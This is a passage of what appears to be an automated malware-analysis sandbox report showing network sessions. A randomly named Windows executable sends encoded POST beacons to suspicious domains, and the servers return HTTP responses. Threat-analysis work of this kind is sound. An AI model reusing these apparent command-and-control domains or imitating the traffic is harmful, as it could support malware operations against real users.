                                                                              Data Raw: 31 62 38 0d 0a a1 38 1a 00 20 d3 9c 39 ad 1c 69 72 62 45 10 f4 31 ad 4f f9 2d 95 fa bd 66 e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd e8 27 bc ea 1c 9e fe 73 13 e8 da 85 c4 20 c8 29 09 4c 73 d2 43 ad c6 00 3f a9 38 9e 61 32 51 6e 11 f7 17 10 34 ad e4 c6 42 f9 a6 2f 65 39 c1 c8 59 04 16 e0 94 93 9f df b5 cd 43 26 09 e2 18 25 1d 1c 04 b9 32 2e 1d 38 2c 69 8b 33 86 d0 3f c4 7d f7 df 45 e2 c9 6d 03 74 80 6b c5 ca cf 6f 6c 65 26 e5 ac d1 b2 ae 9f 9f 5b 21 f6 97 fe 9e fe c3 64 2e e5 f5 7c ae 76 97 3e 7c 65 98 c7 4e 42 88 bd 4c 6b df b2 ef db 5e fb 30 44 2e 94 41 c6 1a fb e9 bf 2f 61 0a 2b 08 51 78 71 b1 80 06 41 c6 86 5d ce 86 84 fe c7 db 53 12 a0 ff 80 9e 51 aa 95 b0 a9 50 59 96 db 42 30 6e 18 a1 a5 b0 9a 8a 54 17 10 61 1d f3 5a 70 52 14 26 77 ce 71 66 88 10 05 17 29 15 39 e5 54 17 c2 f3 b4 81 cc 63 e2 29 25 cc 15 2c 37 a9 27 54 f0 92 b3 5c fb 8c 88 5c 11 2b 78 8b 6b 3b 31 d3 46 57 00 53 12 fe fe 2e dd 62 29 61 88 34 24 b0 f3 d7 f7 1f b1 75 66 be 9b 2e 03 83 73 ac b0 46 28 84 35 60 e6 87 b2 dd 5d [TRUNCATED]
                                                                              Data Ascii: 1b88 9irbE1O-fjdo8G's )LsC?8a2Qn4B/e9YC&%2.8,i3?}Emtkole&[!d.|v>|eNBLk^0D.A/a+QxqA]SQPYB0nTaZpR&wqf)9Tc)%,7'T\\+xk;1FWS.b)a4$uf.sF(5`]a@ ']59q;ToeOf^IT0WFHe T2-4J+0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.849774185.27.134.206803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:56.120266914 CET1692OUTPOST /g3h7/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.canadavinreport.site
                                                                              Origin: http://www.canadavinreport.site
                                                                              Referer: http://www.canadavinreport.site/g3h7/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 33 45 41 46 6f 72 5a 71 59 62 2b 46 6c 36 6f 56 61 45 68 55 42 6a 67 2b 42 57 68 4d 66 46 51 6a 72 66 72 61 4a 53 41 71 79 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 69 43 79 55 4b 47 5a 30 35 38 54 47 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 47 57 [TRUNCATED]
                                                                              Data Ascii: DzLTc=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c3EAForZqYb+Fl6oVaEhUBjg+BWhMfFQjrfraJSAqy5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7oiCyUKGZ058TGfsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YInQ9fhPblz0fqBOSnm0kGENQp04DvM2GNnEEtJ1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWy+VSgR7N/XnvxoLxlJ4GL1oeGLJzIDhUbK0M4gvdvY91p+iSnu+Q/b1L5ltzzSrmAef7fVNFRMNzcxb05W89gL1nm4CyO/UDysER+M6qNOUvXcVMVdmzy7CSnIgmUOu8A5TCRshRbL7DkMU5zj2Qbhsq3UuzuECNosvH52B3KPDzc3SUElzqNFzufcqa1rdrSBeoM/NZPkColUiXf4WkxepdX6LC6f2+FxAHtxo3VgNJyiU7qFDxirPHK6azlRWxnfYamWn1UcUMlY0PqtEwKGqxZchth3glUdns92FKXUcAsLTo4AWXlM8H4F3oP/bkRlxXvDCd3VApKiGDHqBsDThzRch/laI7kFqq4ETEXokRp+dvnud9ybEYrp/0JeGDb4G+grA0+yrC4ruikP2jnbuDtJwaoKvRwMzqKa2lOqViIrwXxVoKyuFtlrWEx31tXk5kbgwqoECuxYdnL71EjkWHEpfbT9V+QTUr0Kk3VFvyUP+2n/53GkC6zyOpP0nOJ9cGvVKlYw2LtYW7 [TRUNCATED]
                                                                              Jan 11, 2025 09:27:56.721045971 CET682INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:56 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Content-Encoding: br
                                                                              Data Raw: 31 62 38 0d 0a a1 38 1a 00 20 d3 9c 39 ad 1c 69 72 62 45 10 f4 31 ad 4f f9 2d 95 fa bd 66 e0 9c a8 13 9d 6a 64 83 6f 96 9c 38 e0 09 97 47 dd e8 27 bc ea 1c 9e fe 73 13 e8 da 85 c4 20 c8 29 09 4c 73 d2 43 ad c6 00 3f a9 38 9e 61 32 51 6e 11 f7 17 10 34 ad e4 c6 42 f9 a6 2f 65 39 c1 c8 59 04 16 e0 94 93 9f df b5 cd 43 26 09 e2 18 25 1d 1c 04 b9 32 2e 1d 38 2c 69 8b 33 86 d0 3f c4 7d f7 df 45 e2 c9 6d 03 74 80 6b c5 ca cf 6f 6c 65 26 e5 ac d1 b2 ae 9f 9f 5b 21 f6 97 fe 9e fe c3 64 2e e5 f5 7c ae 76 97 3e 7c 65 98 c7 4e 42 88 bd 4c 6b df b2 ef db 5e fb 30 44 2e 94 41 c6 1a fb e9 bf 2f 61 0a 2b 08 51 78 71 b1 80 06 41 c6 86 5d ce 86 84 fe c7 db 53 12 a0 ff 80 9e 51 aa 95 b0 a9 50 59 96 db 42 30 6e 18 a1 a5 b0 9a 8a 54 17 10 61 1d f3 5a 70 52 14 26 77 ce 71 66 88 10 05 17 29 15 39 e5 54 17 c2 f3 b4 81 cc 63 e2 29 25 cc 15 2c 37 a9 27 54 f0 92 b3 5c fb 8c 88 5c 11 2b 78 8b 6b 3b 31 d3 46 57 00 53 12 fe fe 2e dd 62 29 61 88 34 24 b0 f3 d7 f7 1f b1 75 66 be 9b 2e 03 83 73 ac b0 46 28 84 35 60 e6 87 b2 dd 5d [TRUNCATED]
                                                                              Data Ascii: 1b88 9irbE1O-fjdo8G's )LsC?8a2Qn4B/e9YC&%2.8,i3?}Emtkole&[!d.|v>|eNBLk^0D.A/a+QxqA]SQPYB0nTaZpR&wqf)9Tc)%,7'T\\+xk;1FWS.b)a4$uf.sF(5`]a@ ']59q;ToeOf^IT0WFHe T2-4J+0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.849790185.27.134.206803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:58.666053057 CET384OUTGET /g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.canadavinreport.site
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:59.264357090 CET1198INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:27:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 997
                                                                              Connection: close
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                              Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("3f5536e462c0f35987862bf1392a3d98");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.849836165.154.96.210803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:05.429371119 CET634OUTPOST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 56 42 54 66 74 6a 64 57 6f 52 59 54 4c 69 46 42 6b 36 6d 41 32 42 79 6a 31 5a 6b 74 6c 65 7a 78 59 6f 64 4e 61 6f 3d
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7VBTftjdWoRYTLiFBk6mA2Byj1ZktlezxYodNao=
                                                                              Jan 11, 2025 09:28:06.336828947 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: F-WEB
                                                                              Date: Sat, 11 Jan 2025 08:28:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575614038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=_UTSvlG0b9Rtm3Xb; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:06 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:06 GMT; HttpOnly
                                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                              Jan 11, 2025 09:28:06.336844921 CET425INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c
                                                                              Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.849856165.154.96.210803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:07.982609034 CET654OUTPOST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 70 5a 6a 32 78 53 6f 53 44 62 72 37 34 74 54 4e 2b 30 31 76 6c 43 59 38 47 61 41 77 76 67 76 4a 6a 50 47 56 43 52
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2pZj2xSoSDbr74tTN+01vlCY8GaAwvgvJjPGVCR
                                                                              Jan 11, 2025 09:28:08.906744003 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: F-WEB
                                                                              Date: Sat, 11 Jan 2025 08:28:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 910
                                                                              Connection: close
                                                                              FAI-W-FLOW: 575740038
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              FAI-W-AGENT_AID: 32663896
                                                                              Update-Time: 1736399500
                                                                              Src-Update: true
                                                                              P3P: CP=CAO PSA OUR
                                                                              Origin-Agent-Cluster: ?0
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Download-Options: noopen
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Set-Cookie: _cliid=VehwFfocxX7HcZ8x; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 08:28:08 GMT; HttpOnly
                                                                              Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 08:28:08 GMT; HttpOnly
                                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <
                                                                              Jan 11, 2025 09:28:08.906780005 CET425INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c
                                                                              Data Ascii: div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="ba


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.849873165.154.96.210803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:28:10.528428078 CET1671OUTPOST /t322/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.yunlekeji.top
                                                                              Origin: http://www.yunlekeji.top
                                                                              Referer: http://www.yunlekeji.top/t322/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 47 79 67 52 47 5a 4b 74 55 46 76 6e 79 57 36 6a 64 34 56 57 4e 2f 61 30 50 70 55 4e 2f 75 52 4b 67 43 6c 35 66 7a 62 48 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4a 75 31 32 7a 30 65 41 6f 79 54 76 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 66 5a [TRUNCATED]
                                                                              Data Ascii: DzLTc=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBGygRGZKtUFvnyW6jd4VWN/a0PpUN/uRKgCl5fzbHwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ju12z0eAoyTv50Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5WXMYIeOkVC86mqruC01xPWWuTQEf9QhTsbJtLiIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAg5UGUbfr+EiEN2Zrk8Nstvpde4lUeBtRr2Iva/rAfyilJlbS2oShRdZkOUb3946TbpR+5RzyUetqoPSnLp7UttKHeRca3X+UTQzCOoIcaB+vW6wsVqiGt8Vx0X7b1Cy4geKeerRr81XygcEj/9SKUuhWkU8uyVFMyN0FEu+kEVEl/e1MJfYZjgSxpB3lwNg8vu9/mNVrsNEKxYVPzHML6o5ZJ//ouBvGo1Bu2l61GfBliMl4FfvujfOkpoE1Wpb/0MPWBmyqSLnYua/JbtTMbEtmm0eRqs3J+hPwMf03EcC+SAjgMP/aZw3VfgJ7uqJAO3PNPuzf6K30Q5YScmatITyMyrTmPc+gRiNu/GFfMh6q0zbOpxVgcTmnbgnM+gBoUePMXQH4qgl2oO8c6MkxycQjnOqnYAMHlFYUuu1LJ6We1m3B8Ez/UNwaB3SjOBs6KnDTMBwyq3vFbHZGaN+/D0O6IRu/I/0/OKJJWFM3X60Sb0Oq+2zp7Gjz+yG5IiPbFlCdTFwuLxs4I6W [TRUNCATED]
                                                                              Jan 11, 2025 09:28:11.490312099 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: F-WEB
